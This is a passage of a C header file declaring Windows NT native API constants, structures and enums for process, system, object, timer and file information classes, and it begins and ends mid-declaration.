(STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE)\n\n#define IO_COMPLETION_QUERY_STATE 0x0001\n#define IO_COMPLETION_MODIFY_STATE 0x0002 \n#define IO_COMPLETION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3) \n\n#define KEYEDEVENT_WAIT 0x0001\n#define KEYEDEVENT_WAKE 0x0002\n#define KEYEDEVENT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | KEYEDEVENT_WAIT | KEYEDEVENT_WAKE)\n\n#define MUTANT_QUERY_STATE 0x0001\n#define MUTANT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|MUTANT_QUERY_STATE)\n\n#define PORT_CONNECT (0x0001)\n#define PORT_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x1)\n\n#define PROFILE_CONTROL (0x0001)\n#define PROFILE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | PROFILE_CONTROL)\n\n#define SEMAPHORE_QUERY_STATE 0x0001\n#define SEMAPHORE_MODIFY_STATE 0x0002 \n#define SEMAPHORE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SYNCHRONIZE|0x3)\n\n#define SYMBOLIC_LINK_QUERY (0x0001)\n#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)\n\n#define THREAD_ALERT\t(0x0004)\n\n#define WORKER_FACTORY_RELEASE_WORKER 0x0001\n#define WORKER_FACTORY_WAIT 0x0002\n#define WORKER_FACTORY_SET_INFORMATION 0x0004\n#define WORKER_FACTORY_QUERY_INFORMATION 0x0008\n#define WORKER_FACTORY_READY_WORKER 0x0010\n#define WORKER_FACTORY_SHUTDOWN 0x0020\n\n#define OBJECT_TYPE_CREATE (0x0001)\n#define OBJECT_TYPE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1)\n\n#define WMIGUID_QUERY 0x0001\n#define WMIGUID_SET 0x0002\n#define WMIGUID_NOTIFICATION 0x0004\n#define WMIGUID_READ_DESCRIPTION 0x0008\n#define WMIGUID_EXECUTE 0x0010\n#define TRACELOG_CREATE_REALTIME 0x0020\n#define TRACELOG_CREATE_ONDISK 0x0040\n#define TRACELOG_GUID_ENABLE 0x0080\n#define TRACELOG_ACCESS_KERNEL_LOGGER 0x0100\n#define TRACELOG_CREATE_INPROC 0x0200\n#define TRACELOG_ACCESS_REALTIME 0x0400\n#define TRACELOG_REGISTER_GUIDS 0x0800\n\n#define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 )\n#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )\n#define ZwCurrentProcess() NtCurrentProcess()\n#define ZwCurrentThread()\t NtCurrentThread()\n\n//\n// Define special ByteOffset parameters for read and write operations\n//\n\n#define FILE_WRITE_TO_END_OF_FILE 0xffffffff\n#define FILE_USE_FILE_POINTER_POSITION 0xfffffffe\n\n//\n// This is the maximum MaximumLength for a UNICODE_STRING.\n//\n\n#define MAXUSHORT 0xffff \n#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) )\n\ntypedef struct _UNICODE_STRING {\n\tUSHORT Length;\n\tUSHORT MaximumLength;\n\tPWSTR Buffer;\n} UNICODE_STRING;\ntypedef UNICODE_STRING *PUNICODE_STRING;\ntypedef const UNICODE_STRING *PCUNICODE_STRING;\n\ntypedef struct _STRING\n{\n\tUSHORT Length;\n\tUSHORT MaximumLength;\n\tPCHAR Buffer;\n} STRING;\ntypedef STRING *PSTRING;\n\ntypedef STRING ANSI_STRING;\ntypedef PSTRING PANSI_STRING;\n\ntypedef STRING OEM_STRING;\ntypedef PSTRING POEM_STRING;\ntypedef CONST STRING* PCOEM_STRING;\ntypedef CONST char *PCSZ;\n\ntypedef struct _CSTRING\n{\n\tUSHORT Length;\n\tUSHORT MaximumLength;\n\tCONST char *Buffer;\n} CSTRING;\ntypedef CSTRING *PCSTRING;\n#define ANSI_NULL ((CHAR)0)\n\ntypedef STRING CANSI_STRING;\ntypedef PSTRING PCANSI_STRING;\n\ntypedef struct _OBJECT_ATTRIBUTES {\n\tULONG Length;\n\tHANDLE RootDirectory;\n\tPUNICODE_STRING ObjectName;\n\tULONG Attributes;\n\tPVOID SecurityDescriptor;\n\tPVOID SecurityQualityOfService;\n} OBJECT_ATTRIBUTES;\ntypedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;\n\ntypedef struct _IO_STATUS_BLOCK {\n\tunion {\n\t\tNTSTATUS Status;\n\t\tPVOID Pointer;\n\t} DUMMYUNIONNAME;\n\n\tULONG_PTR Information;\n} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;\n\n/*\n** Semaphore START\n*/\n\n#ifndef _SEMAPHORE_INFORMATION_CLASS\ntypedef enum _SEMAPHORE_INFORMATION_CLASS {\n\tSemaphoreBasicInformation\n} SEMAPHORE_INFORMATION_CLASS;\n#endif\n\n#ifndef _SEMAPHORE_BASIC_INFORMATION\ntypedef struct _SEMAPHORE_BASIC_INFORMATION {\n\tLONG CurrentCount;\n\tLONG MaximumCount;\n} SEMAPHORE_BASIC_INFORMATION, *PSEMAPHORE_BASIC_INFORMATION;\n#endif\n\n/*\n** Semaphore END\n*/\n\n/*\n** FileCache and MemoryList START\n*/\n\ntypedef enum _SYSTEM_MEMORY_LIST_COMMAND {\n\tMemoryCaptureAccessedBits,\n\tMemoryCaptureAndResetAccessedBits,\n\tMemoryEmptyWorkingSets,\n\tMemoryFlushModifiedList,\n\tMemoryPurgeStandbyList,\n\tMemoryPurgeLowPriorityStandbyList,\n\tMemoryCommandMax\n} SYSTEM_MEMORY_LIST_COMMAND;\n\ntypedef struct _SYSTEM_FILECACHE_INFORMATION {\n\tSIZE_T CurrentSize;\n\tSIZE_T PeakSize;\n\tULONG PageFaultCount;\n\tSIZE_T MinimumWorkingSet;\n\tSIZE_T MaximumWorkingSet;\n\tSIZE_T CurrentSizeIncludingTransitionInPages;\n\tSIZE_T PeakSizeIncludingTransitionInPages;\n\tULONG TransitionRePurposeCount;\n\tULONG Flags;\n} SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION;\n\n/*\n** FileCache and MemoryList END\n*/\n\n/*\n** Processes START\n*/\n\n#ifndef KPRIORITY\ntypedef LONG KPRIORITY;\n#endif\n\ntypedef enum _THREAD_STATE {\n\tStateInitialized,\n\tStateReady,\n\tStateRunning,\n\tStateStandby,\n\tStateTerminated,\n\tStateWait,\n\tStateTransition,\n\tStateUnknown\n} THREAD_STATE;\n\ntypedef enum _KWAIT_REASON {\n\tExecutive,\n\tFreePage,\n\tPageIn,\n\tPoolAllocation,\n\tDelayExecution,\n\tSuspended,\n\tUserRequest,\n\tWrExecutive,\n\tWrFreePage,\n\tWrPageIn,\n\tWrPoolAllocation,\n\tWrDelayExecution,\n\tWrSuspended,\n\tWrUserRequest,\n\tWrEventPair,\n\tWrQueue,\n\tWrLpcReceive,\n\tWrLpcReply,\n\tWrVirtualMemory,\n\tWrPageOut,\n\tWrRendezvous,\n\tWrKeyedEvent,\n\tWrTerminated,\n\tWrProcessInSwap,\n\tWrCpuRateControl,\n\tWrCalloutStack,\n\tWrKernel,\n\tWrResource,\n\tWrPushLock,\n\tWrMutex,\n\tWrQuantumEnd,\n\tWrDispatchInt,\n\tWrPreempted,\n\tWrYieldExecution,\n\tWrFastMutex,\n\tWrGuardedMutex,\n\tWrRundown,\n\tMaximumWaitReason\n} KWAIT_REASON;\n\ntypedef struct _CLIENT_ID {\n\tHANDLE UniqueProcess;\n\tHANDLE UniqueThread;\n} CLIENT_ID, *PCLIENT_ID;\n\ntypedef struct _VM_COUNTERS {\n\tSIZE_T PeakVirtualSize;\n\tSIZE_T VirtualSize;\n\tULONG PageFaultCount;\n\tSIZE_T PeakWorkingSetSize;\n\tSIZE_T WorkingSetSize;\n\tSIZE_T QuotaPeakPagedPoolUsage;\n\tSIZE_T QuotaPagedPoolUsage;\n\tSIZE_T QuotaPeakNonPagedPoolUsage;\n\tSIZE_T QuotaNonPagedPoolUsage;\n\tSIZE_T PagefileUsage;\n\tSIZE_T PeakPagefileUsage;\n\tSIZE_T PrivatePageCount;\n} VM_COUNTERS;\n\ntypedef struct _SYSTEM_THREAD_INFORMATION {\n\tLARGE_INTEGER KernelTime;\n\tLARGE_INTEGER UserTime;\n\tLARGE_INTEGER CreateTime;\n\tULONG WaitTime;\n\tPVOID StartAddress;\n\tCLIENT_ID ClientId;\n\tKPRIORITY Priority;\n\tKPRIORITY BasePriority;\n\tULONG ContextSwitchCount;\n\tTHREAD_STATE State;\n\tKWAIT_REASON WaitReason;\n} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;\n\ntypedef struct _SYSTEM_PROCESSES_INFORMATION {\n\tULONG NextEntryDelta;\n\tULONG ThreadCount;\n\tLARGE_INTEGER SpareLi1;\n\tLARGE_INTEGER SpareLi2;\n\tLARGE_INTEGER SpareLi3;\n\tLARGE_INTEGER CreateTime;\n\tLARGE_INTEGER UserTime;\n\tLARGE_INTEGER KernelTime;\n\tUNICODE_STRING ImageName;\n\tKPRIORITY BasePriority;\n\tHANDLE UniqueProcessId;\n\tHANDLE InheritedFromUniqueProcessId;\n\tULONG HandleCount;\n\tULONG SessionId;\n\tULONG_PTR PageDirectoryBase;\n\tVM_COUNTERS VmCounters;\n\tIO_COUNTERS IoCounters;\n\tSYSTEM_THREAD_INFORMATION Threads[1];\n} SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION;\n\ntypedef enum _PROCESSINFOCLASS {\n\tProcessBasicInformation = 0,\n\tProcessQuotaLimits = 1,\n\tProcessIoCounters = 2,\n\tProcessVmCounters = 3,\n\tProcessTimes = 4,\n\tProcessBasePriority = 5,\n\tProcessRaisePriority = 6,\n\tProcessDebugPort = 7,\n\tProcessExceptionPort = 8,\n\tProcessAccessToken = 9,\n\tProcessLdtInformation = 10,\n\tProcessLdtSize = 11,\n\tProcessDefaultHardErrorMode = 12,\n\tProcessIoPortHandlers = 13,\n\tProcessPooledUsageAndLimits = 14,\n\tProcessWorkingSetWatch = 15,\n\tProcessUserModeIOPL = 16,\n\tProcessEnableAlignmentFaultFixup = 17,\n\tProcessPriorityClass = 18,\n\tProcessWx86Information = 19,\n\tProcessHandleCount = 20,\n\tProcessAffinityMask = 21,\n\tProcessPriorityBoost = 22,\n\tProcessDeviceMap = 23,\n\tProcessSessionInformation = 24,\n\tProcessForegroundInformation = 25,\n\tProcessWow64Information = 26,\n\tProcessImageFileName = 27,\n\tProcessLUIDDeviceMapsEnabled = 28,\n\tProcessBreakOnTermination = 29,\n\tProcessDebugObjectHandle = 30,\n\tProcessDebugFlags = 31,\n\tProcessHandleTracing = 32,\n\tProcessIoPriority = 33,\n\tProcessExecuteFlags = 34,\n\tProcessTlsInformation = 35,\n\tProcessCookie = 36,\n\tProcessImageInformation = 37,\n\tProcessCycleTime = 38,\n\tProcessPagePriority = 39,\n\tProcessInstrumentationCallback = 40,\n\tProcessThreadStackAllocation = 41,\n\tProcessWorkingSetWatchEx = 42,\n\tProcessImageFileNameWin32 = 43,\n\tProcessImageFileMapping = 44,\n\tProcessAffinityUpdateMode = 45,\n\tProcessMemoryAllocationMode = 46,\n\tProcessGroupInformation = 47,\n\tProcessTokenVirtualizationEnabled = 48,\n\tProcessOwnerInformation = 49,\n\tProcessWindowInformation = 50,\n\tProcessHandleInformation = 51,\n\tProcessMitigationPolicy = 52,\n\tProcessDynamicFunctionTableInformation = 53,\n\tProcessHandleCheckingMode = 54,\n\tProcessKeepAliveCount = 55,\n\tProcessRevokeFileHandles = 56,\n\tProcessWorkingSetControl = 57,\n\tProcessHandleTable = 58,\n\tProcessCheckStackExtentsMode = 59,\n\tProcessCommandLineInformation = 60,\n\tProcessProtectionInformation = 61,\n\tMaxProcessInfoClass = 62\n} PROCESSINFOCLASS;\n\ntypedef struct _PROCESS_BASIC_INFORMATION {\n\tNTSTATUS ExitStatus;\n\tPVOID PebBaseAddress;\n\tULONG_PTR AffinityMask;\n\tKPRIORITY BasePriority;\n\tULONG_PTR UniqueProcessId;\n\tULONG_PTR InheritedFromUniqueProcessId;\n} PROCESS_BASIC_INFORMATION;\ntypedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION;\n\ntypedef struct _PROCESS_EXTENDED_BASIC_INFORMATION {\n\tSIZE_T Size;\n\tPROCESS_BASIC_INFORMATION BasicInfo;\n\tunion\n\t{\n\t\tULONG Flags;\n\t\tstruct\n\t\t{\n\t\t\tULONG IsProtectedProcess : 1;\n\t\t\tULONG IsWow64Process : 1;\n\t\t\tULONG IsProcessDeleting : 1;\n\t\t\tULONG IsCrossSessionCreate : 1;\n\t\t\tULONG IsFrozen : 1;\n\t\t\tULONG IsBackground : 1;\n\t\t\tULONG IsStronglyNamed : 1;\n\t\t\tULONG SpareBits : 25;\n\t\t} DUMMYSTRUCTNAME;\n\t} DUMMYUNIONNAME;\n} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION;\n\n/*\n** Processes END\n*/\n\n#ifndef _SYSTEM_INFORMATION_CLASS\ntypedef enum _SYSTEM_INFORMATION_CLASS\n{\n\tSystemBasicInformation = 0,\n\tSystemProcessorInformation = 1,\n\tSystemPerformanceInformation = 2,\n\tSystemTimeOfDayInformation = 3,\n\tSystemPathInformation = 4,\n\tSystemProcessInformation = 5,\n\tSystemCallCountInformation = 6,\n\tSystemDeviceInformation = 7,\n\tSystemProcessorPerformanceInformation = 8,\n\tSystemFlagsInformation = 9,\n\tSystemCallTimeInformation = 10,\n\tSystemModuleInformation = 11,\n\tSystemLocksInformation = 12,\n\tSystemStackTraceInformation = 13,\n\tSystemPagedPoolInformation = 14,\n\tSystemNonPagedPoolInformation = 15,\n\tSystemHandleInformation = 16,\n\tSystemObjectInformation = 17,\n\tSystemPageFileInformation = 18,\n\tSystemVdmInstemulInformation = 19,\n\tSystemVdmBopInformation = 20,\n\tSystemFileCacheInformation = 21,\n\tSystemPoolTagInformation = 22,\n\tSystemInterruptInformation = 23,\n\tSystemDpcBehaviorInformation = 24,\n\tSystemFullMemoryInformation = 25,\n\tSystemLoadGdiDriverInformation = 26,\n\tSystemUnloadGdiDriverInformation = 27,\n\tSystemTimeAdjustmentInformation = 28,\n\tSystemSummaryMemoryInformation = 29,\n\tSystemMirrorMemoryInformation = 30,\n\tSystemPerformanceTraceInformation = 31,\n\tSystemObsolete0 = 32,\n\tSystemExceptionInformation = 33,\n\tSystemCrashDumpStateInformation = 34,\n\tSystemKernelDebuggerInformation = 35,\n\tSystemContextSwitchInformation = 36,\n\tSystemRegistryQuotaInformation = 37,\n\tSystemExtendServiceTableInformation = 38,\n\tSystemPrioritySeperation = 39,\n\tSystemVerifierAddDriverInformation = 40,\n\tSystemVerifierRemoveDriverInformation = 41,\n\tSystemProcessorIdleInformation = 42,\n\tSystemLegacyDriverInformation = 43,\n\tSystemCurrentTimeZoneInformation = 44,\n\tSystemLookasideInformation = 45,\n\tSystemTimeSlipNotification = 46,\n\tSystemSessionCreate = 47,\n\tSystemSessionDetach = 48,\n\tSystemSessionInformation = 49,\n\tSystemRangeStartInformation = 50,\n\tSystemVerifierInformation = 51,\n\tSystemVerifierThunkExtend = 52,\n\tSystemSessionProcessInformation = 53,\n\tSystemLoadGdiDriverInSystemSpace = 54,\n\tSystemNumaProcessorMap = 55,\n\tSystemPrefetcherInformation = 56,\n\tSystemExtendedProcessInformation = 57,\n\tSystemRecommendedSharedDataAlignment = 58,\n\tSystemComPlusPackage = 59,\n\tSystemNumaAvailableMemory = 60,\n\tSystemProcessorPowerInformation = 61,\n\tSystemEmulationBasicInformation = 62,\n\tSystemEmulationProcessorInformation = 63,\n\tSystemExtendedHandleInformation = 64,\n\tSystemLostDelayedWriteInformation = 65,\n\tSystemBigPoolInformation = 66,\n\tSystemSessionPoolTagInformation = 67,\n\tSystemSessionMappedViewInformation = 68,\n\tSystemHotpatchInformation = 69,\n\tSystemObjectSecurityMode = 70,\n\tSystemWatchdogTimerHandler = 71,\n\tSystemWatchdogTimerInformation = 72,\n\tSystemLogicalProcessorInformation = 73,\n\tSystemWow64SharedInformationObsolete = 74,\n\tSystemRegisterFirmwareTableInformationHandler = 75,\n\tSystemFirmwareTableInformation = 76,\n\tSystemModuleInformationEx = 77,\n\tSystemVerifierTriageInformation = 78,\n\tSystemSuperfetchInformation = 79,\n\tSystemMemoryListInformation = 80,\n\tSystemFileCacheInformationEx = 81,\n\tSystemThreadPriorityClientIdInformation = 82,\n\tSystemProcessorIdleCycleTimeInformation = 83,\n\tSystemVerifierCancellationInformation = 84,\n\tSystemProcessorPowerInformationEx = 85,\n\tSystemRefTraceInformation = 86,\n\tSystemSpecialPoolInformation = 87,\n\tSystemProcessIdInformation = 88,\n\tSystemErrorPortInformation = 89,\n\tSystemBootEnvironmentInformation = 90,\n\tSystemHypervisorInformation = 91,\n\tSystemVerifierInformationEx = 92,\n\tSystemTimeZoneInformation = 93,\n\tSystemImageFileExecutionOptionsInformation = 94,\n\tSystemCoverageInformation = 95,\n\tSystemPrefetchPatchInformation = 96,\n\tSystemVerifierFaultsInformation = 97,\n\tSystemSystemPartitionInformation = 98,\n\tSystemSystemDiskInformation = 99,\n\tSystemProcessorPerformanceDistribution = 100,\n\tSystemNumaProximityNodeInformation = 101,\n\tSystemDynamicTimeZoneInformation = 102,\n\tSystemCodeIntegrityInformation = 103,\n\tSystemProcessorMicrocodeUpdateInformation = 104,\n\tSystemProcessorBrandString = 105,\n\tSystemVirtualAddressInformation = 106,\n\tSystemLogicalProcessorAndGroupInformation = 107,\n\tSystemProcessorCycleTimeInformation = 108,\n\tSystemStoreInformation = 109,\n\tSystemRegistryAppendString = 110,\n\tSystemAitSamplingValue = 111,\n\tSystemVhdBootInformation = 112,\n\tSystemCpuQuotaInformation = 113,\n\tSystemNativeBasicInformation = 114,\n\tSystemErrorPortTimeouts = 115,\n\tSystemLowPriorityIoInformation = 116,\n\tSystemBootEntropyInformation = 117,\n\tSystemVerifierCountersInformation = 118,\n\tSystemPagedPoolInformationEx = 119,\n\tSystemSystemPtesInformationEx = 120,\n\tSystemNodeDistanceInformation = 121,\n\tSystemAcpiAuditInformation = 122,\n\tSystemBasicPerformanceInformation = 123,\n\tSystemQueryPerformanceCounterInformation = 124,\n\tSystemSessionBigPoolInformation = 125,\n\tSystemBootGraphicsInformation = 126,\n\tSystemScrubPhysicalMemoryInformation = 127,\n\tSystemBadPageInformation = 128,\n\tSystemProcessorProfileControlArea = 129,\n\tSystemCombinePhysicalMemoryInformation = 130,\n\tSystemEntropyInterruptTimingInformation = 131,\n\tSystemConsoleInformation = 132,\n\tSystemPlatformBinaryInformation = 133,\n\tSystemPolicyInformation = 134,\n\tSystemHypervisorProcessorCountInformation = 135,\n\tSystemDeviceDataInformation = 136,\n\tSystemDeviceDataEnumerationInformation = 137,\n\tSystemMemoryTopologyInformation = 138,\n\tSystemMemoryChannelInformation = 139,\n\tSystemBootLogoInformation = 140,\n\tSystemProcessorPerformanceInformationEx = 141,\n\tSystemSpare0 = 142,\n\tSystemSecureBootPolicyInformation = 143,\n\tSystemPageFileInformationEx = 144,\n\tSystemSecureBootInformation = 145,\n\tSystemEntropyInterruptTimingRawInformation = 146,\n\tSystemPortableWorkspaceEfiLauncherInformation = 147,\n\tSystemFullProcessInformation = 148,\n\tSystemKernelDebuggerInformationEx = 149,\n\tSystemBootMetadataInformation = 150,\n\tSystemSoftRebootInformation = 151,\n\tSystemElamCertificateInformation = 152,\n\tSystemOfflineDumpConfigInformation = 153,\n\tSystemProcessorFeaturesInformation = 154,\n\tSystemRegistryReconciliationInformation = 155,\n\tSystemEdidInformation = 156,\n\tMaxSystemInfoClass = 157\n} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;\n#endif\n\n/*\n** Timer START\n*/\n\n//\n// Timer APC routine definition.\n//\n\ntypedef VOID(*PTIMER_APC_ROUTINE) (\n\t_In_ PVOID TimerContext,\n\t_In_ ULONG TimerLowValue,\n\t_In_ LONG TimerHighValue\n\t);\n\ntypedef enum _TIMER_TYPE {\n\tNotificationTimer,\n\tSynchronizationTimer\n} TIMER_TYPE;\n\n#ifndef _TIMER_INFORMATION_CLASS\ntypedef enum _TIMER_INFORMATION_CLASS {\n\tTimerBasicInformation\n} TIMER_INFORMATION_CLASS;\n#endif\n\n#ifndef _TIMER_BASIC_INFORMATION\ntypedef struct _TIMER_BASIC_INFORMATION {\n\tLARGE_INTEGER RemainingTime;\n\tBOOLEAN TimerState;\n} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION;\n#endif\n\n/*\n** Timer END\n*/\n\ntypedef VOID(NTAPI *PIO_APC_ROUTINE)(\n\t_In_ PVOID ApcContext,\n\t_In_ PIO_STATUS_BLOCK IoStatusBlock,\n\t_In_ ULONG Reserved\n\t);\n\ntypedef struct _OBJECT_DIRECTORY_INFORMATION {\n\tUNICODE_STRING Name;\n\tUNICODE_STRING TypeName;\n} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;\n\n#ifndef InitializeObjectAttributes\n#define InitializeObjectAttributes( p, n, a, r, s ) { \\\n (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \\\n (p)->RootDirectory = r; \\\n (p)->Attributes = a; \\\n (p)->ObjectName = n; \\\n (p)->SecurityDescriptor = s; \\\n (p)->SecurityQualityOfService = NULL; \\\n }\n\n//\n// Valid values for the Attributes field\n//\n\n#define OBJ_INHERIT 0x00000002L\n#define OBJ_PERMANENT 0x00000010L\n#define OBJ_EXCLUSIVE 0x00000020L\n#define OBJ_CASE_INSENSITIVE 0x00000040L\n#define OBJ_OPENIF 0x00000080L\n#define OBJ_OPENLINK 0x00000100L\n#define OBJ_KERNEL_HANDLE 0x00000200L\n#define OBJ_FORCE_ACCESS_CHECK 0x00000400L\n#define OBJ_VALID_ATTRIBUTES 0x000007F2L\n\n#endif\n\n\n/*\n** Objects START\n*/\n\n#ifndef _OBJECT_INFORMATION_CLASS\ntypedef enum _OBJECT_INFORMATION_CLASS {\n\tObjectBasicInformation,\n\tObjectNameInformation,\n\tObjectTypeInformation,\n\tObjectTypesInformation,\n\tObjectHandleFlagInformation,\n\tObjectSessionInformation,\n\tMaxObjectInfoClass\n} OBJECT_INFORMATION_CLASS;\n#endif\n\n#ifndef _OBJECT_BASIC_INFORMATION\ntypedef struct _OBJECT_BASIC_INFORMATION {\n\tULONG Attributes;\n\tACCESS_MASK GrantedAccess;\n\tULONG HandleCount;\n\tULONG PointerCount;\n\tULONG PagedPoolCharge;\n\tULONG NonPagedPoolCharge;\n\tULONG Reserved[3];\n\tULONG NameInfoSize;\n\tULONG TypeInfoSize;\n\tULONG SecurityDescriptorSize;\n\tLARGE_INTEGER CreationTime;\n} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;\n#endif\n\n#ifndef _OBJECT_NAME_INFORMATION\ntypedef struct _OBJECT_NAME_INFORMATION {\n\tUNICODE_STRING Name;\n} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION;\n#endif\n\n#ifndef _OBJECT_TYPE_INFORMATION\ntypedef struct _OBJECT_TYPE_INFORMATION {\n\tUNICODE_STRING TypeName;\n\tULONG TotalNumberOfObjects;\n\tULONG TotalNumberOfHandles;\n\tULONG TotalPagedPoolUsage;\n\tULONG TotalNonPagedPoolUsage;\n\tULONG TotalNamePoolUsage;\n\tULONG TotalHandleTableUsage;\n\tULONG HighWaterNumberOfObjects;\n\tULONG HighWaterNumberOfHandles;\n\tULONG HighWaterPagedPoolUsage;\n\tULONG HighWaterNonPagedPoolUsage;\n\tULONG HighWaterNamePoolUsage;\n\tULONG HighWaterHandleTableUsage;\n\tULONG InvalidAttributes;\n\tGENERIC_MAPPING GenericMapping;\n\tULONG ValidAccessMask;\n\tBOOLEAN SecurityRequired;\n\tBOOLEAN MaintainHandleCount;\n\tULONG PoolType;\n\tULONG DefaultPagedPoolCharge;\n\tULONG DefaultNonPagedPoolCharge;\n} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;\n#endif\n\ntypedef struct _OBJECT_TYPE_INFORMATION_8 {\n\tUNICODE_STRING TypeName;\n\tULONG TotalNumberOfObjects;\n\tULONG TotalNumberOfHandles;\n\tULONG TotalPagedPoolUsage;\n\tULONG TotalNonPagedPoolUsage;\n\tULONG TotalNamePoolUsage;\n\tULONG TotalHandleTableUsage;\n\tULONG HighWaterNumberOfObjects;\n\tULONG HighWaterNumberOfHandles;\n\tULONG HighWaterPagedPoolUsage;\n\tULONG HighWaterNonPagedPoolUsage;\n\tULONG HighWaterNamePoolUsage;\n\tULONG HighWaterHandleTableUsage;\n\tULONG InvalidAttributes;\n\tGENERIC_MAPPING GenericMapping;\n\tULONG ValidAccessMask;\n\tBOOLEAN SecurityRequired;\n\tBOOLEAN MaintainHandleCount;\n\tUCHAR TypeIndex;\n\tCHAR ReservedByte;\n\tULONG PoolType;\n\tULONG DefaultPagedPoolCharge;\n\tULONG DefaultNonPagedPoolCharge;\n} OBJECT_TYPE_INFORMATION_8, *POBJECT_TYPE_INFORMATION_8;\n\n#ifndef _OBJECT_TYPES_INFORMATION\ntypedef struct _OBJECT_TYPES_INFORMATION\n{\n\tULONG NumberOfTypes;\n\tOBJECT_TYPE_INFORMATION TypeInformation;\n} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION;\n#endif\n\n#ifndef _OBJECT_HANDLE_FLAG_INFORMATION\ntypedef struct _OBJECT_HANDLE_FLAG_INFORMATION\n{\n\tBOOLEAN Inherit;\n\tBOOLEAN ProtectFromClose;\n} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION;\n#endif\n/*\n** Objects END\n*/\n\n/*\n** File start\n*/\n\n#define FILE_SUPERSEDE 0x00000000\n#define FILE_OPEN 0x00000001\n#define FILE_CREATE 0x00000002\n#define FILE_OPEN_IF 0x00000003\n#define FILE_OVERWRITE 0x00000004\n#define FILE_OVERWRITE_IF 0x00000005\n#define FILE_MAXIMUM_DISPOSITION 0x00000005\n\n#define FILE_DIRECTORY_FILE 0x00000001\n#define FILE_WRITE_THROUGH 0x00000002\n#define FILE_SEQUENTIAL_ONLY 0x00000004\n#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008\n\n#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010\n#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020\n#define FILE_NON_DIRECTORY_FILE 0x00000040\n#define FILE_CREATE_TREE_CONNECTION 0x00000080\n\n#define FILE_COMPLETE_IF_OPLOCKED 0x00000100\n#define FILE_NO_EA_KNOWLEDGE 0x00000200\n#define FILE_OPEN_FOR_RECOVERY 0x00000400\n#define FILE_RANDOM_ACCESS 0x00000800\n\n#define FILE_DELETE_ON_CLOSE 0x00001000\n#define FILE_OPEN_BY_FILE_ID 0x00002000\n#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000\n#define FILE_NO_COMPRESSION 0x00008000\n\n#define FILE_RESERVE_OPFILTER 0x00100000\n#define FILE_OPEN_REPARSE_POINT 0x00200000\n#define FILE_OPEN_NO_RECALL 0x00400000\n#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000\n\n\n#define FILE_COPY_STRUCTURED_STORAGE 0x00000041\n#define FILE_STRUCTURED_STORAGE 0x00000441\n\n#define FILE_VALID_OPTION_FLAGS 0x00ffffff\n#define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032\n#define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032\n#define FILE_VALID_SET_FLAGS 0x00000036\n\n#ifndef _FILE_INFORMATION_CLASS\ntypedef enum _FILE_INFORMATION_CLASS\n{\n\tFileDirectoryInformation = 1,\n\tFileFullDirectoryInformation,\n\tFileBothDirectoryInformation,\n\tFileBasicInformation,\n\tFileStandardInformation,\n\tFileInternalInformation,\n\tFileEaInformation,\n\tFileAccessInformation,\n\tFileNameInformation,\n\tFileRenameInformation,\n\tFileLinkInformation,\n\tFileNamesInformation,\n\tFileDispositionInformation,\n\tFilePositionInformation,\n\tFileFullEaInformation,\n\tFileModeInformation,\n\tFileAlignmentInformation,\n\tFileAllInformation,\n\tFileAllocationInformation,\n\tFileEndOfFileInformation,\n\tFileAlternateNameInformation,\n\tFileStreamInformation,\n\tFilePipeInformation,\n\tFilePipeLocalInformation,\n\tFilePipeRemoteInformation,\n\tFileMailslotQueryInformation,\n\tFileMailslotSetInformation,\n\tFileCompressionInformation,\n\tFileObjectIdInformation,\n\tFileCompletionInformation,\n\tFileMoveClusterInformation,\n\tFileQuotaInformation,\n\tFileReparsePointInformation,\n\tFileNetworkOpenInformation,\n\tFileAttributeTagInformation,\n\tFileTrackingInformation,\n\tFileIdBothDirectoryInformation,\n\tFileIdFullDirectoryInformation,\n\tFileValidDataLengthInformation,\n\tFileShortNameInformation,\n\tFileIoCompletionNotificationInformation,\n\tFileIoStatusBlockRangeInformation,\n\tFileIoPriorityHintInformation,\n\tFileSfioReserveInformation,\n\tFileSfioVolumeInformation,\n\tFileHardLinkInformation,\n\tFileProcessIdsUsingFileInformation,\n\tFileNormalizedNameInformation,\n\tFileNetworkPhysicalNameInformation,\n\tFileIdGlobalTxDirectoryInformation,\n\tFileMaximumInformation\n} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;\n#endif\n\n#ifndef _FILE_INFORMATION_CLASS\ntypedef enum _FSINFOCLASS 